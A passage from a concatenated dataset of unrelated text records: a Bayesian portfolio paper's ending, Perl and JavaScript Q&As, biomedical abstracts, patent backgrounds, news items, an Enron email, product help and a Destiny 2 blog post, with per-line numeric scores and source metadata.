-\\frac{1}{2\\left(\\frac{\\sigma_1}{\\sqrt{n}}\\right)^2} (\\overline{\\alpha_v}-\\theta_1)^2 \\right\\rbrace d\\theta_1\\end{gathered}$$\n\nNow we recognize that the term inside the integral is close to the density of a normal distribution. ", "Hence, this gives us the idea of doing the change of variables: $$\\begin{gathered}\ny_1=\\frac{\\theta_1-\\overline{\\alpha_v}}{\\frac{\\sigma_1}{\\sqrt{n}}} \\Rightarrow dy_1=\\frac{\\sqrt{n}}{\\sigma_1}d\\theta_1 \\Rightarrow d\\theta_1=\\frac{\\sigma_1}{\\sqrt{n}}dy_1\\Rightarrow \\\\\n\\Rightarrow LHS=\\sqrt{2\\pi}exp \\left\\lbrace -\\frac{1}{2\\sigma_1^2} \\sum_{i=1}^n (\\alpha_i-\\overline{\\alpha_v})^2 \\right\\rbrace \\int_{\\theta_1} \\frac{1}{\\sqrt{2\\pi}} exp \\left\\lbrace -\\frac{1}{2}y_1^2 \\right\\rbrace \\frac{\\sigma_1}{\\sqrt{n}} dy_1=\\\\\n=\\sqrt{2\\pi} \\frac{\\sigma_1}{\\sqrt{n}}exp \\left\\lbrace -\\frac{1}{2\\sigma_1^2} \\sum_{i=1}^{n} (\\alpha_i-\\overline{\\alpha_v})^2 \\right\\rbrace\\end{gathered}$$ As mentioned before, a similar identity can be showed for the second integral that depends solely on $\\theta_2$ and this completes the proof of the proposition.", "\n\n[9]{} Baum, L.E., Katz, M. and Read, R.R. (Feb 1962) *Convergence rates for the Law of Large Numbers*. ", "American Mathematical Society, Vol. ", "102, No. ", "2, pp. ", "187-199\n\nBellman, R. (1970) *Introduction to Matrix Analysis*. ", "McGraw-Hill, New York.", "\n\nGuangliang, H. and Litterman, R. (Feb. 2017) *The Intuition Behind Black-Litterman Model Portfolios*. ", "SSRN, 22 Oct. 2002, Web.", "\n\nJanecek, K. (2004) *What is a Realistic Aversion to Risk for Real-world Individual Investors*. ", "Semanticsscholar, Web.", "\n\nLeonard, T. and Hsu, John S.J. (Dec. 1992) *Bayesian Inference for a Covariance Matrix*. ", "The Annals of Statistics, vol. ", "20, no. ", "4, pp. ", "1669-1696\n\nLeonard, T. and Hsu, John S.J. (1999) *Bayesian Methods: An Analysis for Statisticians and Interdisciplinary Researchers*. ", "Cambridge UK, Cambridge UP.", "\n\n[^1]: Please refer to subsection \\[pi\\] for more details on how the market equilibrium is computed\n" ]
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[ "Q:\n\nHow to compare the second line with the first line in one single file using perl?", "\n\nI am new to Perl, Currently, I am using Perl to do some text processing. ", "There are four columns in the input file, separated by tab. ", "I want to find the minimum of column 3 and maximum of column 4 and put them in one line for the same ID. ", "Below shows how the input file look like: \nA A1 1 5\nA A1 9 18\nA A1 23 40\nA A2 20 30\nA A2 35 43\nB A1 2 10\nB A1 12 30\nB A1 35 100\nC A9 2 40\nC A9 45 70\n\nMy desired output:\nA A1 1 40\nA A2 23 43\nB A1 2 100\nC A9 2 70\n\nA:\n\nReading data file line by line, using the combination of first two columns as key of a record hash, and rembering in that hash the minimum column three and maximum column four. ", "If you want to keep the order of those keys, also push them to an array.", "\n#!", "/usr/bin/perl\n\nuse strict;\nuse warnings;\n\nuse feature qw(switch say);\n\nuse Data::Dumper;\n\nmy (%record, @key);\n\nwhile (<>) {\n chomp;\n my @field = split /\\s+/;\n my $key = join \"\\t\", @field[0,1];\n push @key, $key unless $record{$key};\n if (!", "$record{$key}{min} || $record{$key}{min} > $field[2]) {\n $record{$key}{min} = $field[2];\n }\n if (!", "$record{$key}{max} || $record{$key}{max} < $field[3]) {\n $record{$key}{max} = $field[3];\n }\n}\n\nfor my $key (@key) {\n print (join \"\\t\", $key, $record{$key}{min}, $record{$key}{max}, \"\\n\");\n}\n\n" ]
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[ 0, 0, 0, 0, 0, 0, 0, 0.023715415019762844, 0, 0.004901960784313725 ]
[ "But that doesn't make a lot of sense does it? ", "When initializing a\ndirectory with groups they would all be empty until users are added,\nperhaps by the application. ", "Is there another group other than\ngroupOfNames and groupOfUniqueNames with such a limitiation? ", "It seems a\nsilly limitation.", "\n\nMust an application then create a group of groups to list the ones that\nare available, then have exception logic for adding attribute values to\na group entry that may not yet exist?" ]
{ "pile_set_name": "Pile-CC" }
[ 0, 0, 0, 0, 0 ]
[ "Physicochemical characteristics and antioxidant activity of Prunus cerasoides D. Don gum exudates.", "\nThe physicochemical properties and antioxidant activity of Prunus cerasoides D. Don gum exudates was investigated in this study. ", "The total carbohydrate and protein content were found to be 73.72±2.44% and 2.33±1.25%, respectively. ", "Analysis of monosaccharide composition by HPLC-RI system after acid hydrolysis of the gum showed the presence of arabinose, galactose, glucose, rhamnose and xylose. ", "The molecular weight of the gum was also found to be 5.55×10(5)Da. ", "FTIR and DSC studies showed characteristics typical of a natural polysaccharide. ", "The viscosity of 2% aqueous solution of the gum exhibited non-Newtonian type of flow and the gum was also found to show pH dependent swelling. ", "Determination of the angle of repose, Carr's index and Hausner ratio indicate the gum possess fairly good powder flow property. ", "The antioxidant properties of the gum were evaluated by determining DPPH and hydroxyl scavenging activities, reducing power and total phenolic contents which showed the gum possess antioxidant property." ]
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[ "Buried in the Wordplay: Life Sciences Graduates From Google X\n\nBuried in the Alphabet announcement was a significant piece of news: one of the new portfolio companies in Larry Page’s Scrabble game is Life Sciences. ", "Until yesterday, the medical research operation had been one of the major initiatives inside of Google X. So Page’s declaration is the de-facto “graduation” of this enterprise from the moonshot-loving research division. ", "You can even say that this graduation is magna cum laude, because now it will be a company, albeit a fully owned subsidiary of Alphabet.", "\n\nI have gotten confirmation that the current leader of Life Sciences, Andrew Conrad, will continue to run the operation, presumably as one of Page’s quasi-independent CEOs. ", "In establishing the company as an entity in itself, Conrad has some advantages in that some of his projects have already taken on powerful partners. ", "The flagship venture at Life Sciences is a bold attempt at early disease detection that involves releasing smart nanoparticles in the bloodstream, which can identify markers of nascent heath issues, and signal the user through a wearable device. ", "Conrad describes the system as similar to the Star Trek “Tricorder” which instantly diagnoses one’s ailments. ", "He’s working with Stanford and MIT. (", "You can learn about it in this interview I did with Conrad.) ", "Other projects include a smart contact lens (in partnership with Novartis) and the organization of a “Baseline Study” to establish the genetic parameters of what a healthy person is. (", "Partners include Duke and Stanford.) [", "UPDATE: the day after the Alphabet announcement, DexCom, a company whose mission is “to help move health care from reactive to proactive,” announced a partnership with Life Sciences to develop advanced glucose monitoring technology.]", "\n\nLife Sciences might be the perfect case to gauge whether Page’s portfolio scheme has its intended purpose of less bureaucracy and faster innovation. ", "As the leader of Life Sciences, how much time will Conrad be spending on tasks related to running a company as opposed to research that takes advantage of his unique skills? ", "And while a good deal of the activity at Life Sciences is biological lab work that has had little to do with the rest of Google, some of its projects rely heavily on artificial intelligence and data mining. ", "Up until now, engineers in those fields could move freely between Google X and other areas of Google. ", "It’s not clear how much of that fungibility will exist under the new structure. ", "We also don’t have an idea of how Google plans to charge these new companies for shared resources like data centers. (", "I’m assuming that “Google Classic,” the part of the company with search, ads, Android, and YouTube, retains possession of the infrastructure. ", "But Alphabet hasn’t gone into that degree of detail in its explanation.)", "\n\nIn any case, establishing Life Sciences as a separate company under the Alphabet umbrella may wind up being one of the most important legacies of this shift — in terms of Alphabet finances and our future health." ]
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[ "Known dip coating is by immersing the item to be coated in a bath consisting entirely of the coating and moving the item out of the bath. ", "A meniscus naturally forms between the bath and the item, and a coating of the bath material clings to the item. ", "To coat, for example, a cylinder, the cylinder is oriented with its long axis vertically and is moved down into the bath and then upward out of the bath. ", "As it leaves the bath, it is coated with the bath material.", "\nWhere the bath chemically deteriorates with the passage of time or by contamination from items immersed or the atmosphere, it is discarded and replaced by a new bath. ", "This invention may employ standard coating apparatus but significantly limits the amount of bath material which is subject to such discharge. ", "This invention employs a ring of coating material floating on a column of noncoating material. ", "Example 1 of U.S. Pat. ", "No. ", "5,683,742 to Herbert et al. ", "has a film of coating material sprayed on water." ]
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[ "Chapel of the Holy Cross (Holderness, New Hampshire)\n\nThe Chapel of the Holy Cross is a historic church at 45 Chapel Lane on the campus of Holderness School in Holderness, New Hampshire. ", " Built in 1884 to a design by Charles Coolidge Haight, it is a prominent regional example of Gothic Revival architecture. ", " The building was listed on the National Register of Historic Places in 2005.", "\n\nDescription and history\nThe Chapel of the Holy Cross occupies a prominent location near the center of the Holderness School campus, separated from New Hampshire Route 175 by the school's athletic fields. ", " It is a single-story brick building, with its long axis oriented east-west. ", " Its main entrances are on the long south side, the eastern one set facing east in a projecting brick vestibule, and the western one sheltered by a wooden porch. ", " The vestibule extends further to a square three-stage tower, which is topped by an octagonal steeple and cross.", "\n\nThe masonry Gothic Revival building was built in 1884 to a design by Charles Coolidge Haight. ", " It was paid for by a gift from Sarah Titus Zabriskie. ", " The building has undergone only modest external changes since its construction, the most notable being the 1957 enlargement of the organ wing on the north side to accommodate an organ the school had acquired from the Castle in the Clouds estate. ", " The chapel's 19th century stained glass windows (maker unknown, but speculated to be the New York studio of J & R Lamb) were replaced in the 1930s and 1940s, in part by original windows by the studio of Charles Jay Connick, and in part by windows that had been removed from the All Saints Church in Peterborough, and adapted to their new location by Connick.", "\n\nSee also\nNational Register of Historic Places listings in Grafton County, New Hampshire\n\nReferences\n\nCategory:Churches on the National Register of Historic Places in New Hampshire\nCategory:Gothic Revival church buildings in New Hampshire\nCategory:Churches completed in 1884\nCategory:19th-century churches in the United States\nCategory:Churches in Grafton County, New Hampshire\nCategory:National Register of Historic Places in Grafton County, New Hampshire\nCategory:Holderness, New Hampshire\nCategory:University and college chapels in the United States" ]
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[ "---------------------- Forwarded by Don Miller/HOU/ECT on 09/26/2000 09:25 AM \n---------------------------\n \n\t\n\t\n\tFrom: Mitch Robinson @ ENRON 09/25/2000 01:03 PM\n\t\n\nTo: Don Miller/HOU/ECT@ECT, Stuart Zisman/HOU/ECT@ECT\ncc: Richard Broussard/Corp/Enron@Enron \nSubject: Enron North American Peaker Facilities ('2000 & '99) Safety Stats.", "\n\nfyi.", "\n---------------------- Forwarded by Mitch Robinson/Corp/Enron on 09/25/2000 \n01:05 PM ---------------------------\n\n\nRoss Newlin@ENRON_DEVELOPMENT\n09/25/2000 12:48 PM\nTo: Mitch Robinson@Enron\ncc: Tom Callaghan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT \n\nSubject: Enron North American Peaker Facilities ('2000 & '99) Safety Stats.", "\n\nMitch,\nThe attachments below indicate OEC/ENA safety records for calendar years 99' \nand 00', for your use in the data room if you see fit. ", "Let me know if you \nneed more on this topic.", "\nHard copy of Brownsville's annual EPA inspection will be forwarded under \nseperate cover today. ", "Unfortunately, New Albany and Caledonia inspections' \njust occurred and we will not have hard copy for roughly 30 days. ", "I will \nforward upon receipt.", "\nGus is currently expediting draft copies of all RATA test for your \nconsideration to include in data room. ", "I will forward upon receipt.", "\nAnything else, let me know,\nRoss\n\n---------------------- Forwarded by Ross Newlin/ENRON_DEVELOPMENT on \n09/25/2000 12:53 PM ---------------------------\n\n\nScott Watson\n09/22/2000 01:57 PM\nTo: Ross Newlin/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT\ncc: \n\nSubject: Enron North American Peaker Facilities ('2000 & '99) Safety Stats.", "\n\nRoss:\n\nAs you requested.", "\n\n\n\nScott" ]
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[ 0.013736263736263736, 0, 0.015479876160990712, 0, 0, 0.010309278350515464, 0, 0, 0.009259259259259259, 0, 0.015527950310559006, 0.038461538461538464, 0.1111111111111111 ]
[ "Q:\n\nhow do I make first option of select tag selectable?", "\n\nBy default, the first option of a select tag is 'selected', is it not? ", "So, that makes it unselectable, since it's already selected. ", "At least, that's the behavior I'm seeing. ", "Of course, using 'onChange' is naturally going to ignore it, and that is probably the cause. ", "How to I make it register a 'change' when selected, or how do I get the selection other than with onChange?", "\nthanks\n\nA:\n\nA common solution is to make the first option be blank, or be the words \"select one...\", or some such. ", " That way, any meaningful selection will trigger the onChange. ", " Also, you usually don't want the first option to end up selected by default just because it's first.", "\nIf you do intend to have a default choice, but you want to trigger an event when the user explicitly selects the default choice by clicking, you could presumably listen for the select box's onClick event, but that seems like an odd need. ", " If the correct option is already selected, the user is likely to just go on to the next field.", "\n\n" ]
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[ "Tetracycline nanoparticles loaded calcium sulfate composite beads for periodontal management.", "\nThe objective of this study was to fabricate, characterize and evaluate in vitro, an injectable calcium sulfate bone cement beads loaded with an antibiotic nanoformulation, capable of delivering antibiotic locally for the treatment of periodontal disease. ", "Tetracycline nanoparticles (Tet NPs) were prepared using an ionic gelation method and characterized using DLS, SEM, and FTIR to determine size, morphology, stability and chemical interaction of the drug with the polymer. ", "Further, calcium sulfate (CaSO4) control and CaSO4-Tet NP composite beads were prepared and characterized using SEM, FTIR and XRD. ", "The drug release pattern, material properties and antibacterial activity were evaluated. ", "In addition, protein adsorption, cytocompatibility and alkaline phosphatase activity of the CaSO4-Tet NP composite beads in comparison to the CaSO4 control were analyzed. ", "Tet NPs showed a size range of 130±20nm and the entrapment efficiency calculated was 89%. ", "The composite beads showed sustained drug release pattern. ", "Further the drug release data was fitted into various kinetic models wherein the Higuchi model showed higher correlation value (R(2)=0.9279) as compared to other kinetic models. ", "The composite beads showed antibacterial activity against Staphylococcus aureus and Escherichia coli. ", "The presence of Tet NPs in the composite bead didn't alter its cytocompatibility. ", "In addition, the composite beads enhanced the ALP activity of hPDL cells. ", "The antibacterial and cytocompatible CaSO4-Tet NP composite beads could be beneficial in periodontal management to reduce the bacterial load at the infection site. ", "Tet NPs would deliver antibiotic locally at the infection site and the calcium sulfate cement, would itself facilitate tissue regeneration." ]
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[ "Enzyme-linked immunosorbent assay for the specific detection of angiostatin-like plasminogen moieties in biological samples.", "\nAn enzyme-linked immunosorbent assay (ELISA) was developed for the specific detection of human angiostatin-like plasminogen moieties (comprising kringles 1-4) in biological samples. ", "The assay involves prior removal of all other plasminogen moieties by immunoadsorption of diluted samples (to about 10 ng/ml plasminogen) with a mixture of insolubilized MA-42B12 (directed against kringle 5) and MA-31E9 (directed against the proteinase domain). ", "The recovery of angiostatin during this procedure is > or = 95%. ", "Subsequently, angiostatin-like fragments are detected in an ELISA, based on two monoclonal antibodies reacting with nonoverlapping epitopes in the kringle 1-3 domain: MA-36E6 for capture and MA-34D3 for tagging. ", "The assay has a lower detection limit of about 0.1 ng/ml and is performed with intra- and interassay coefficient of variation of 2.4% and 15%. ", "In tumor fluids obtained from cancer patients (n = 10), angiostatin levels ranged between 0.24 and 6.7 microg/ml (1.62+/-0.60 microg/ml; mean+/-S.E.M.) The identity of angiostatin was confirmed by immunoblotting using specific monoclonal antibodies. ", "A weak correlation (r = .66) was observed with the total plasminogen concentration in these samples. ", "This ELISA thus appears suitable for the specific quantitation of angiostatin-like plasminogen moieties in biological samples, and may be useful to study its (patho)physiological relevance." ]
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[ 0, 0.00546448087431694, 0.003816793893129771, 0, 0.0047169811320754715, 0, 0, 0, 0.005291005291005291 ]
[ "Council approves zoning for Guadalupe Villas on first reading, neighborhood packs chamber\n\nIt was a packed chamber for Lubbock City Council Thursday night as Guadalupe residents came out to speak about the proposed Guadalupe Villas development.", "\n\nThis was just the first reading of the ordinance, but the council approved the zoning measure 5 to 1, with only Councilman Juan Chadis, a resident of the north \"El Barrio\" neighborhood, voting against it.", "\n\nThe Planning & Zoning commission on January 9 approved the zoning change of a plot of land between 3rd Street and the Marsha Sharp Freeway from Interstate Highway Commercial to High-Density Apartment.", "\n\nThe request came from Hugo Reed and Associates, Inc., for DWR Development Group, LLC on behalf of former Texas Tech Chancellor Kent Hance, KRS Housing. ", "The plan now is to build single and two-story apartment complexes for seniors age 62 and older, the Guadalupe Villas.", "\n\nMost residents of the neighborhood speaking against the development expressed desire for single-family homes to keep the historical and family friendly neighborhood.", "\n\nOpponents expressed concern the complex would lower property values for their homes, add traffic, require infrastructure not accessible in the area as well as disruption to a quaint area with tradition of passing homes and property from generation to generation. ", "Many were concerned there would be a lack of respect or understanding of their neighborhood by temporary tenants of the rental property.", "\n\nA home builder also got up to speak about his desire to build single-family homes, something he says he heard many say there was no desire to do such.", "\n\nOpponents also worry about how the project will be handled by property management in the future and how the facility would be maintained.", "\n\nDevelopers and those for the project also spoke following the opposition, assuring the residents and council of the what they called a promising development.", "\n\nThe developers told the council the homeowners adjacent to the property were properly informed about the project after its inception in mid December and the project was even changed from multi-family low-income housing to the senior housing because of concerns heard from the neighborhood.", "\n\nProponents said this development is needed now and the area can not wait for single-family homes or holding out hope for a future project.", "\n\nEmployees of similar Lubbock housing complexes expressed support and their assurances the facilities are well-kept and operated in ways welcoming to senior citizens who they feel need affordable housing.", "\n\nLubbock Mayor Dan Pope called it a good use of the land and pointed out that those directly by the property are for it. ", "He said he had hard time seeing what stands in the way.", "\n\nKaren Gibson was concerned that the property was left vacant for so long and thinks this will be a good project. ", "She said she feels for both sides and thanked citizens for the courteous public hearing.", "\n\nMayor Pro Tem Latrelle Joy said the project has a chance of not happening as it applies for a housing tax credit.", "\n\nJeff Griffith said he has a similar property in his district that tried to do single-family homes near the freeway that has failed so far. ", "He said this project will help revitalize downtown and also thanked the audience for their respect.", "\n\nCouncilman Steve Massengale reminded people that Thursday night's decision is not final and this is just for zoning. ", "He says this will not hurt the nearby school and will help with senior living. ", "He thinks this will be a quality project\n\nThere will be another reading of the ordinance in a following council meeting.", "\n\nPresident Donald Trump visited a Florida community reeling from a deadly school shooting, meeting privately with victims and cheering the heroics of first responders, but extending few public words of consolation...\n\nPresident Donald Trump visited a Florida community reeling from a deadly school shooting, meeting privately with victims and cheering the heroics of first responders, but extending few public words of consolation to those in deep mourning." ]
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[ "How can we help you today?", "\n\nEKM Omnimeter I v.3\n\nModified on: Mon, 26 Mar, 2018 at 11:28 AM\n\nThe Omnimeter I v.3 can meter nearly any electrical system that is commonly used around the world. ", "It can operate on 50 or 60 Hz, 120 to 480 volts, 1-phase or 3-phase, it is accurate to 0.5%, and can meter up to 5000 amp systems. ", "There is not an electrical system in common use that this meter will not support - except 3 phase 3 wire (no neutral) over 415 volts specifically. ", "Here it is on our website: EKM-Omnimeter I v.3\n\nWe have received accuracy certification from the California Department of Weights and Measures for revenue grade metering, also known as California Type Approval. ", "This is an accuracy standard that many other states look to for their revenue grade requirements. ", "Here is the certificate: EKM California Type Approval\n\nThe Omnimeters are powered by the system they are metering. ", "kWh data will be retained in the meter, even if it loses power for up to 10 years.", "\n\nThis meter uses external Current Transformers (CTs) and will not function properly without them. ", "These are sold separately on our website. ", "The CTs measure the electrical current in the wires being measured. ", "Which CTs are right for you will be determined by your type of electrical system, the maximum Amperage of your system, and the diameter of the wires being read. ", "Solid-core CTs are less expensive but are a bit more difficult to install, they require that you disconnect or cut the wires being read and slip the CT over the wire. ", "Split-Core CTs are more expensive but they simply clamp around the wires being read, making them much easier to install.", "\n\nUse 1 CT for single phase 2-wire systems (one hot and one neutral, with or without ground).", "\n\nUse 2 CTs for a 120/240V three-wire system (two hots and a neutral, with or without ground).", "\n\nUse 2 CTs for 3-phase 3-wire systems. (", "without neutral, up to 415V)\n\nUse 3 CTs for 3-phase 4-wire systems. (", "with neutral, up to 480V)\n\nWe have CTs that can meter up to 5000 amps in stock. ", "The CT ratio is selectable inside the meter. ", "Here is our selection of Current Transformers.", "\n\nYou can read the face of the meter, or set it up to be read with your computer. ", "The remote read is a simple RS-485, 2 wire system which can then be connected to one of our communication devices that will enable you to read your meters over the internet from anywhere in the world. ", "Here are some of our options:\n\nWe highly recommend our cloud-based meter communication system, the EKM Push — if you have internet access. ", "The EKM Push works in conjunction with our Omnimeters by handling all of the meter communication, parsing the meter data, and inserting the reads into our cloud database. ", "This completely eliminates all of the configuration issues of firewalls, dynamic IP, and having a computer running all the time to make the communications happen. ", "Data is available seamlessly and immediately from your EKM Push account. ", "The entire system has been designed to be a robust, scalable, metering system, with an easy plug-and-play installation with FREE access to your meter data.", "\n\nThe Widget is quick and easy but our main software product for EKM Push users is Encompass.io.", "\n\nYou can also just wire the meter directly to your computer on site using our USB converter.", "\n\nYou can wirelessly bridge the hardwired RS-485 network at any point using our 485Bee wireless mesh. ", "This would be between multiple meters or between a meter and any of the communication converters mentioned above.", "\n\nYou can also view and log meter data using our EKM Dash software (PC, Mac, Linux). ", "You can even download a free 30-day trial from our website at the bottom of the Dash product page here: EKM Dash\n\nORDER HERE: We have also assembled a number of customizable Metering Packages to help our customers determine which combination of products are right for their needs. ", "Check out all of our Packages here:Metering Packages\n\nHow to install an Omnimeter (v.4 in this case but v.3 Omnimeters are installed in a similar way):" ]
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[ "Engineers are constantly seeking improved performance and expanded capabilities for fuel systems, especially for those related to compression ignition engines. ", "Numerous references show four wire systems that include first and second electrical actuators associated with each fuel injector. ", "One of the electrical actuators typically relates to pressure control, and the other of the two electrical actuators is typically associated with controlling the needle valve member to open and close the nozzle outlet. ", "In some common rail four wire systems, the first electrical actuator may be associated with controlling an intensifier piston to perform injections at an elevated pressure, which is greater than a pressure maintained in the common rail. ", "The second electrical actuator relieves and applies hydraulic pressure on a needle valve member to open and close a nozzle outlet independent of controlling the intensifier. ", "An example of such a system has been known as the Bosch APCRS fuel system. ", "Such a system can inject fuel at a high pressure directly from the rail via the utilization of the electrical actuator for needle control alone, or inject at an even higher intensified pressure by utilizing both the needle valve actuator and a second electrical actuator associated with intensifier control.", "\nAn additional example of an intensified common rail fuel system is provided in U.S. Patent Application Publication No. ", "2003/0089802. ", "Specifically, the cited reference teaches a fuel injector having a first directional control valve for triggering an injector and a second directional control valve for actuating a pressure intensifier. ", "Both of the first and second directional control valves are actuated using a single actuating element that is coupled with the directional control valves via a shared hydraulic coupling chamber. ", "Each directional control valve includes a neutral position and two switched positions, which may be selected via actuation of the single actuating element. ", "Although fuel systems of this type have achieved expanded capabilities, there remains room for improving performance and reducing complexity.", "\nThe present disclosure is directed toward one or more of the problems set forth above including improving performance and/or reducing complexity in electronically controlled fuel systems." ]
{ "pile_set_name": "USPTO Backgrounds" }
[ 0, 0, 0, 0, 0, 0.013333333333333334, 0, 0.008333333333333333, 0, 0, 0, 0, 0, 0 ]
[ "Media resources\n\nAre you looking for the latest news or your next story on issues affecting our great marine nation? ", "We have the facts, figures and people to answer all of your marine science questions. ", "If you need facts for an article or program on climate change, coastal development, or the Great Barrier Reef we can help.", "\n\nAIMS is Australia’s tropical marine science agency, and we have been helping government, industry and the public understand and manage Australia’s coastal and marine estate for more than 40 years.", "\n\nOur research examines some of today's big marine science questions:\n\nHow will coral reef ecosystems respond to climate change?", "\n\nWhat role do marine microbes play in healthy ecosystems?", "\n\nHow does good water quality support commercial fisheries, tourism and recreational angling?", "\n\nWhat do we know and not know about how these massive, interconnected ecosystems work?", "\n\nCan’t see your question? ", "Then take a look at some of our other research or check out our marine science factsheets. ", "Our scientists are also available to talk about their research.", "\n\nJournalists wishing to join our media mailing list can do so by clicking the subscribe button below." ]
{ "pile_set_name": "Pile-CC" }
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "NT-proBNP and cardiac events in older diabetic patients.", "\nNT-proBNP is an excellent predictor of adverse events in patients with diabetes mellitus. ", "Due to an aging population it is of interest to determine whether NT-proBNP can predict cardiac events with equal precision in subgroups with different ages. ", "1395 outpatients with diabetes mellitus were recruited for this prospective observational study. ", "NT-proBNP, renal function, lipid status and other demographic variables were measured at baseline. ", "The cohort was divided into three groups: Group I (609 patients under 60 years of age), group II (634 patients ranging from 60-75) and group III (152 patients older than 75). ", "Patients were followed during a mean observation period of 11 months, 75 patients reached the defined endpoint, which was unplanned hospitalization due to a cardiac event. ", "Mean age was 60 ± 30 years, mean HbA(1c) was 7.6% and mean NT-proBNP was 242 ± 437 pg/ml. ", "In a multiple Cox regression model, age (hazard ratio (HR) 11.18, p < 0.01) and the absence of a cardiac disease (HR 0.49, p < 0.01) were important variables for short-term prognosis. ", "The addition of the logarithm of NT-proBNP provided independent prognostic information (HR 1.81 p < 0.01) and significantly increased the explained variance of the model (χ(2 )= 22.93; d.f. ", "= 1; p < 0.01). ", "More importantly, the predictive power of this model was similar in different age-groups. ", "The prognostic information of NT-proBNP was not influenced by age and this biomarker remained a reliable predictor of short-term cardiac events in patients with diabetes mellitus aged 75 years or older." ]
{ "pile_set_name": "PubMed Abstracts" }
[ 0, 0, 0, 0, 0.010101010101010102, 0.011428571428571429, 0, 0, 0, 0.005263157894736842, 0, 0, 0 ]
[ "Reviving the Human Connection\n\nThis week’s Top 3—we need each other, we’re only human\n\nPhoto by Aman Shrivastava on Unsplash\n\nThe advent of technology has paved the way for constant connectivity. ", "Yet we find ourselves, less connected. ", "Nowadays, a person can go about their days without having to engage deeply with another person. ", "We live a life of convenience with almost everything at our beck and call.", "\n\nHave we evolved too far?", "\n\nGone are the days where we rely on hunters and gatherers to feed a tribe. ", "Or the physical need for a community to raise a child. ", "We can now teach ourselves what was previously the job of elders. ", "Our families and friends live across continents, and speaking to them is only an app away.", "\n\nAs a society, we have evolved to be more distant to our community than our ancestors.", "\n\nNevertheless, we are humans and as individualistic our culture has become, we need each other to thrive.", "\n\nThis week’s top three — pieces advocating human connection." ]
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[ "1. ", "Field of the Invention\nThe present invention relates generally to switching systems for musical instruments and, more particularly to a programmable pickup and transducer switching system for the selection of multiple pickups and transducers for musical instruments.", "\n2. ", "Description of the Related Art\nElectric guitars and other electric instruments typically provide one or more pickups that “pickup” the steel strings within the electro-magnetic field or pole of the pickup system to produce an electric signal output when the steel strings are moving while being played. ", "Likewise, transducers that reside under a bridge saddle or under each individual string saddle provide amplification for nylon string type instruments or allow for an acoustic type sound of instruments with steel strings employing transducers in addition to the magnetic pickups.", "\nMany types of pickups and transducers exist and each produce specific tone and timbre qualities depending on the location where these pickups are placed under the strings. ", "Depending on the type of pickup configurations, the instrument can produce even more unique tones and timbre sound qualities. ", "The electric signals produced by the plurality of pickup locations and pickup types are sent to an amplifier or recording device from which the instrument's sound can be heard. ", "Many switching schemes and systems provide different combinations for when the pickups are on and active producing sound or not. ", "That is, switching systems allow a musician to change, in real time, the sound of his/her musical instrument during a musical performance at times of their discretion. ", "Prior art switching or selection systems do not provide for full combinatorial Boolean logic of possible combinations of pickup selections, that is two raised to the number of pickups installed on an instrument. ", "The number two is used because a pickup can be selected on or off. ", "Using an instrument with four pickups, two raised to the fourth, equals sixteen possible selections or combinatorial Boolean logic expressions of four pickups mixing on and off with each other. ", "Furthermore, the prior art does not provide a method for quick, convenient switching of selection of pickups in a way conducive to real time live performance or in recording situations.", "\nTherefore, a need exists for programmable/semi-programmable pickup and transducer switching systems for the selection of multiple pickups and transducers for musical instruments, that enables programming with great ease (even while in live and real time performance), and provides many combinations of pickup selections ranging in multiple pickup numbers, such as three, four, five, etc., ", "single coil or single coil mixed with humbucking configurations and/or piezo type transducers." ]
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[ "I only played 3 video games this year...well, not really, but I only played three games for a substantial amount of time. ", "People who know me or who have heard me speak in the last two years can guess what one of them is. ", "The other two are both on the Nintendo Switch (with a third on deck). ", "Let's talk about why I keep going back to the same series and why I am finally at a point where I can spread my gaming wings a little bit.", "\n\nI played Four Hundred and Forty Four hours of Destiny. ", "Let's take a minute to let that sink in. ", "Four. ", "Hundred. ", "And Forty. ", "Four. ", "Hours. ", "Since Destiny 2 was released in early September, I have played One Hundred and Four hours of Destiny 2. ", "Even though I put in a lot of time, I still consider myself to be a casual Destiny player. ", "Let me take a little time to explain my weekly Destiny 2 routine before I get into what I think of the game.", "\n\nThe main story campaign in Destiny 2 takes about 10-12 hours to complete. ", "The campaign is very good. ", "In a nutshell: the Cabal empire, led by a monstrous villain called Ghaul, attach the home of the Guardians of the Galaxy (Not those Guardians, other ones) and entrap The Traveler, the mysterious source of the Light, or Power, of the Guardians. ", "The campaign in vanilla Destiny was one of the weakest aspects of that game. ", "It seems like Bungie really wanted to make the campaign something more memorable. ", "At the end of the day, the campaign is just the precursor to where the majority of the average player's time will be spent: The Endgame. ", "In Destiny 2's endgame, there are several weekly activities that can be completed for \"Powerful Gear.\" ", "There is the Flashpoint, The Nightfall Strike, The Raid, Call to Arms, and occasionally there is a special event.", "\n\nThis is my Titan and a view of the tower, currently decorated in the holiday spirit\n\nThe Flashpoint is one of the patrol areas that has higher than usual enemy activity. ", "The Nightfall Strike is a very difficult version of a 15-20 minute mission that is played with two other players. ", "The Raid (or Raid Layer) is a 1-4 Hour activity that can be played with up to six people. ", "Call to Arms is a PvP activity that can be completed in just 4-5 ten minute sessions. ", "Special events range from Sparrow Racing, Iron Banner, Holiday Events, or new PvP game modes. ", "You can also have up to three characters, so once you finish some of these activities with one character, you can switch to another with different abilities so that you can do them again. ", "If it sounds like there is a whole hell of a lot to do, there is. ", "The problem that the hardcore D2 community is having with Bungie right now is that there aren't enough rewarding activities to do. ", "A condensed list of their complaints are: There isn't enough gear to chase, the exotics aren't as powerful as in D1, we want another Raid, the Eververse (microtransaction vendor) is dumb, I don't have enough storage space for my gear, I want you to bring \"X\" feature back because it was better in D1, etc. ", "Even though I sympathize with these angry folks, as a player who puts in 1-3 hours on an average week, I am not playing NEARLY enough to do all that there is to do each week. ", "I have still not reached the power cap, I still have 10 guns to grind for in the Curse of Osiris expansion, I have Crucible ornaments to unlock, I have Raid Armor sets to acquire, I haven't even played Trials of the Nine yet, and there are tons of exotics that I don't have.", "\n\nThis is Tess, she is one of the most hated aspects of Destiny 2 right now. ", "She sells loot boxes\n\nIf you have never played Destiny, this likely sounds foreign to you. ", "Just know that it is a loot shooter where the shooting feels great, the PvE play is awesome, and there really is a ton to do despite what people in the Destiny Subreddit will tell you. ", "When I started playing Destiny regularly, it was deep into year two. ", "Over my roughly one year with the game, I had 3+ years of content to get through. ", "I barely played anything else because there was just SO much to do. ", "There is still a lot to do in D2, but the difference is that I'm not behind. ", "I'm caught up (relatively). ", "So what I'm finally able to do is to do my weekly milestones starting on Tuesday, the beginning of the Destiny week, and when I have done all I care to do for the 